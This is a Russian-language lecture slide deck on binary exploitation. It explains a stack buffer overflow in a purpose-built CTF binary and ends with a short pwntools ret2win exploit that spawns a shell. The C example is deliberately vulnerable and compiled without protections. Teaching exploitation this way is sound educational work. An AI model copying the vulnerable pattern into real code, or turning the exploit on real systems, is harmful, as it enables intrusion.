---
title: Pwn
author: Heartbleed
extensions:
  - image_ueberzug
  - qrcode
styles:
  style: vim
---

# План

1. Поймем как читать бинарные файлы(.exe, .elf)
2. Немного об *опасных* функциях в Си
3. Узнаем что такое pwn
4. Разберем что такое buffer overflow и как он работает
5. Продемонстрируем что дает нам 4-ый пункт 


---

# Как читать бинарники

## Тулзы

Для этого есть 2 популярных инстурмента

- Ghidra
- IDA

---

# Как читать бинарники

### Ghidra

![14](./img/second3.png)

---

# Как читать бинарники

### IDA

![14](./img/ida.png)

---

# Опасные функции в Си

- [?] system
- [?] scanf
- [?] printf
- [?] gets
- [?] strcpy
- [?] strcat
- ...

---

# Справочка

В качестве примера используется .elf со следующим кодом на Си

```c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <signal.h>

void disable_buffering(void) {
    setvbuf(stdin, NULL, _IONBF, 0);
    setvbuf(stdout, NULL, _IONBF, 0);
    setvbuf(stderr, NULL, _IONBF, 0);
}

void ret2win(void) {
  system("/bin/sh");
}

int main(void) {
    disable_buffering();
    signal(SIGALRM, alarm_handler);
    alarm(5);

    int message = 0x31337;
    char buf[100] = {0};    

    printf("Enter ♂right♂ value: ");
    read(0, buf, 0x100);

    if (message == 0xdeadbeef) {
        system("cat flag");
    } else {
        printf("message = 0x%x\n", message);
        printf("Oops!!! let\'s try again\n");
    }
    return 0;
}
```

И скомпилированный следующей коммандой

```bash
gcc -o easy_overflow -fno-stack-protector -fno-pie -no-pie -O0 easy_overflow.c
```

Цель - получить содержимое файла `flag`

На всякий случай qr на transfer для скачивания

```qrcode
https://termbin.com/23sc
```

---

# Что дальше?

![30](./img/second1.png)

---

![30](./img/second2.png)

---

![30](./img/second3.png)

---

![30](./img/second4.png)


---

# Анализируем 

Итак, чтобы получить флаг нам нужно каким-то образом
положить в local_c **0xdeadbeef**, при том что мы вводим local_78

На первый взгляд задача невыполнимая, но если посмотреть на функцию ввода 
`read(0,&local_78,0x100)` и на одну строчку на языке ассемблера `SUB RSP, 0x70`
то можно увидеть buffer overflow.

---

# Почему buffer overflow?

Потому что все локальные переменные (т.е. в пределах функции) хранятся на стеке.

`SUB RSP, 0x70` подобная строчка обычно находится в первых строчках любой функции.
Она отвечает за резервирование памяти под стек.

В данном случае под стек, где хранятся все наши переменные выделено 0x70 байт

А считываем мы 0x100... Но теперь надо проверить еще один момент.
Как расположены переменные, можем ли мы перезаписать `local_c` или она вне  нашей досягаемости.


---

# Смотрим стек

## Ситуация первая

local_c находится выше по стеку чем local_78 -> перезаписать local_c не можем

|    Stack   |
|------------|
| 0x00031337 <- local_c| 
| 0x41414141 <- local_78|
| 0x41414141 |
| 0x41414141 |
| 0x55fa1356 |
| 0x00401452 |
|     ...    |

---

# Смотрим стек

## Вторая

local_c ниже чем local_78 -> можно перезаписать

|    Stack   |
|------------|
| 0x41414141 <- local_78|
| 0x41414141 |
| 0x41414141 |
| 0x00031337  <- local_c| 
| 0x55fa1356 |
| 0x00401452 |
|     ...    |
|           |

|    Stack   |
|------------|
| 0x41414141 <- local_78|
| 0x41414141 |
| 0x41414141 |
| 0x000313***41***  <- local_c| 
| 0x55fa1356 |
| 0x00401452 |
|     ...    |


---

![30](./img/second6.png)

---

![30](./img/second7.png)

---

# Менее очевидный способ решения задачи

Перезаписать адрес возврата и прыгать по всей программе

---

# Ret2win

## Подробнее разберем работу стека

|    Stack   |
|------------|
| 0x41414141 <- local_78|
| 0x41414141 |
| 0x41414141 |
| 0x000313***41***  <- local_c| 
| 0x55fa1356 <- leave addr|
| 0x00401452 <- ret addr|
|     ...    |

На самом деле когда вызывается функция на стеке появляются 2 очень важных адреса.

1. leave addr - адрес стека предыдущей функции
2. ret addr - адрес возврата, после ассемблерной инструкции ret мы будем перемещаться по этому адресу

---

# Ret2win

На сл скриншотах наглядно покажем как просиходит прыжок по ret addr

![30](./img/second10.png)

---

# Ret2win

![30](./img/second11.png)

---

# Ret2win

![30](./img/second12.png)

---

# Ret2win

Итак не долго думая приходим к выводу что переаписывая leave addr мы можем менять стек как хотим, например перезаписать на вообщее другую область памяти и натворить там делов.

А перезаписывая ret addr мы можем прыгать по памяти, можно например прыгнуть в main и зациклить программу. Для примера прыгнем на функцию ret2win(), которая дает нам shell.

---

# Ret2win

![30](./img/second13.png)

---

# Ret2win

Коммандой `pwn template --host HOST --port PORT ./file > exploit.py` можно сгенерировать шаблон эксплойта, в примере ниже обрезан шаблонный код.

exploit.py
```python
...
...
io = start()

pl = b'A' * 0x70
pl += p64(0)
pl += p64(0x00401220)

io.sendline(pl)

io.interactive()
```

---

# Ret2win

## pwned

![30](./img/second14.png)

---

# Заканчиваем про бинарщину

Используя ret addr можно создавать цепочки из ассемблерных инструкций вида:

`pop rdx; ret`, `mov rax, rdx; inc rax; ret` и т.д.

Это называется ROP-цепочкой.

Удивительно как неверно заданный размер буффера можно довести до выполнения произвольного кода RCE.

А дальше крипта от Артёма.
